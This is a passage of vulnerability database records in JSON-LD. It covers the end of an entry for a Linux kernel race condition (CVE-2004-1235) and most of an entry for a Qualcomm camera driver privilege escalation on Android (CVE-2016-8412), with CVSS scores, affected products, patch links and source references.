        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-image-2.4.18-powerpc_2.4.18-1woody6_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-686-smp_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-benh/kernel-patch-benh_20020304woody1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-586tsc_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-686-smp_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14.4.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-686_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-k7_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-alpha_2.4.18-15woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-smp_2.4.18-15woody1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-generic_2.4.18-15woody1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-k6_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-image-2.4.18-powerpc-smp_2.4.18-1woody6_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-patch-2.4.18-powerpc_2.4.18-1woody6.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14.4.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-386_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-doc-2.4.18_2.4.18-14.4_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1-generic_2.4.18-15woody1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-powerpc-xfs/kernel-image-2.4.18-powerpc-xfs_20020329woody1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-k7_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-586tsc_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-i386_2.4.18-13.2.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-image-2.4.18-newpmac_2.4.18-1woody6_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-powerpc-xfs/kernel-image-2.4.18-powerpc-xfs_20020329woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-k6_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-i386_2.4.18-13.2.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-386_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-686_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14.4_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-686_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-benh/kernel-patch-benh_20020304woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-powerpc-xfs/kernel-image-2.4.18-powerpc-xfs_20020329woody1.tar.gz"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-9665"
      },
      {
        "db": "VULMON",
        "id": "CVE-2004-1235"
      },
      {
        "db": "BID",
        "id": "12190"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000008"
      },
      {
        "db": "PACKETSTORM",
        "id": "46535"
      },
      {
        "db": "PACKETSTORM",
        "id": "46873"
      },
      {
        "db": "PACKETSTORM",
        "id": "46534"
      },
      {
        "db": "PACKETSTORM",
        "id": "46587"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-1235"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-062"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-9665"
      },
      {
        "db": "VULMON",
        "id": "CVE-2004-1235"
      },
      {
        "db": "BID",
        "id": "12190"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000008"
      },
      {
        "db": "PACKETSTORM",
        "id": "46535"
      },
      {
        "db": "PACKETSTORM",
        "id": "46873"
      },
      {
        "db": "PACKETSTORM",
        "id": "46534"
      },
      {
        "db": "PACKETSTORM",
        "id": "46587"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-1235"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-062"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2005-04-14T00:00:00",
        "db": "VULHUB",
        "id": "VHN-9665"
      },
      {
        "date": "2005-04-14T00:00:00",
        "db": "VULMON",
        "id": "CVE-2004-1235"
      },
      {
        "date": "2005-01-07T00:00:00",
        "db": "BID",
        "id": "12190"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2005-000008"
      },
      {
        "date": "2006-05-23T05:09:34",
        "db": "PACKETSTORM",
        "id": "46535"
      },
      {
        "date": "2006-05-31T21:33:01",
        "db": "PACKETSTORM",
        "id": "46873"
      },
      {
        "date": "2006-05-23T05:09:34",
        "db": "PACKETSTORM",
        "id": "46534"
      },
      {
        "date": "2006-05-23T16:45:46",
        "db": "PACKETSTORM",
        "id": "46587"
      },
      {
        "date": "2005-04-14T04:00:00",
        "db": "NVD",
        "id": "CVE-2004-1235"
      },
      {
        "date": "2005-01-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200504-062"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-9665"
      },
      {
        "date": "2017-10-11T00:00:00",
        "db": "VULMON",
        "id": "CVE-2004-1235"
      },
      {
        "date": "2007-01-18T02:41:00",
        "db": "BID",
        "id": "12190"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2005-000008"
      },
      {
        "date": "2017-10-11T01:29:43.527000",
        "db": "NVD",
        "id": "CVE-2004-1235"
      },
      {
        "date": "2005-10-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200504-062"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "12190"
      },
      {
        "db": "PACKETSTORM",
        "id": "46535"
      },
      {
        "db": "PACKETSTORM",
        "id": "46873"
      },
      {
        "db": "PACKETSTORM",
        "id": "46534"
      },
      {
        "db": "PACKETSTORM",
        "id": "46587"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-062"
      }
    ],
    "trust": 1.3
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel of Multiple function race condition vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000008"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "competitive condition",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-062"
      }
    ],
    "trust": 0.6
  }
}

var-201701-0091
Vulnerability from variot

An elevation of privilege vulnerability in the Qualcomm camera could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-31225246. References: QC-CR#1071891. GoogleNexus is a smart device from Google. Google Nexus is prone to multiple privilege-escalation vulnerabilities. These issues are being tracked by Android Bug IDs A-31225246 and A-31243641

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201701-0091",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "android one",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "nexus 6p",
        "scope": null,
        "trust": 0.9,
        "vendor": "google",
        "version": null
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "6"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "5x"
      },
      {
        "model": "pixel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00173"
      },
      {
        "db": "BID",
        "id": "95238"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006749"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8412"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-049"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8412"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Di Shen (@returnsme) of KeenLab (@keen_lab), Tencent.",
    "sources": [
      {
        "db": "BID",
        "id": "95238"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-049"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2016-8412",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.6,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2016-8412",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-00173",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.0,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2016-8412",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-8412",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-00173",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201701-049",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-8412",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00173"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8412"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006749"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8412"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-049"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the Qualcomm camera could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-31225246. References: QC-CR#1071891. GoogleNexus is a smart device from Google. Google Nexus is prone to multiple privilege-escalation vulnerabilities. \nThese issues are being tracked by Android Bug IDs A-31225246 and A-31243641",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8412"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006749"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-00173"
      },
      {
        "db": "BID",
        "id": "95238"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8412"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-8412",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "95238",
        "trust": 2.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006749",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-00173",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-049",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8412",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00173"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8412"
      },
      {
        "db": "BID",
        "id": "95238"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006749"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8412"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-049"
      }
    ]
  },
  "id": "VAR-201701-0091",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00173"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00173"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:19:38.496000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin - January 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for GoogleNexusQualcommCameraDriver Privilege Escalation Vulnerability (CNVD-2017-00173)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/87669"
      },
      {
        "title": "Google Android Qualcomm Camera Fixes for permission permissions and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=66793"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014January 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=e8654f311f23268a7da69416ca7535a2"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/google-patches-29-critical-android-vulnerabilities-including-holes-in-mediaserver-qualcomm/122852/"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00173"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8412"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006749"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-049"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-284",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006749"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8412"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/95238"
      },
      {
        "trust": 1.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-8412"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-8412"
      },
      {
        "trust": 0.3,
        "url": "http://www.android.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.google.com/nexus/"
      },
      {
        "trust": 0.3,
        "url": "https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=42a98c44669d92dafcf4d6336bdccaeb2db12786"
      },
      {
        "trust": 0.3,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html "
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/284.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://threatpost.com/google-patches-29-critical-android-vulnerabilities-including-holes-in-mediaserver-qualcomm/122852/"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00173"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8412"
      },
      {
        "db": "BID",
        "id": "95238"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006749"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8412"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-049"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00173"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8412"
      },
      {
        "db": "BID",
        "id": "95238"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006749"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8412"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-049"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00173"
      },
      {
        "date": "2017-01-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8412"
      },
      {
        "date": "2017-01-03T00:00:00",
        "db": "BID",
        "id": "95238"
      },
      {
        "date": "2017-01-24T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006749"
      },
      {
        "date": "2017-01-12T20:59:00.187000",
        "db": "NVD",
        "id": "CVE-2016-8412"
      },
      {
        "date": "2017-01-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-049"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00173"
      },
      {
        "date": "2017-01-18T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8412"
      },
      {
        "date": "2017-01-12T01:09:00",
        "db": "BID",
        "id": "95238"
      },
      {
        "date": "2017-01-24T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006749"
      },
      {
        "date": "2017-01-18T02:59:13.737000",
        "db": "NVD",
        "id": "CVE-2016-8412"
      },
      {
        "date": "2017-02-06T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-049"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-049"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
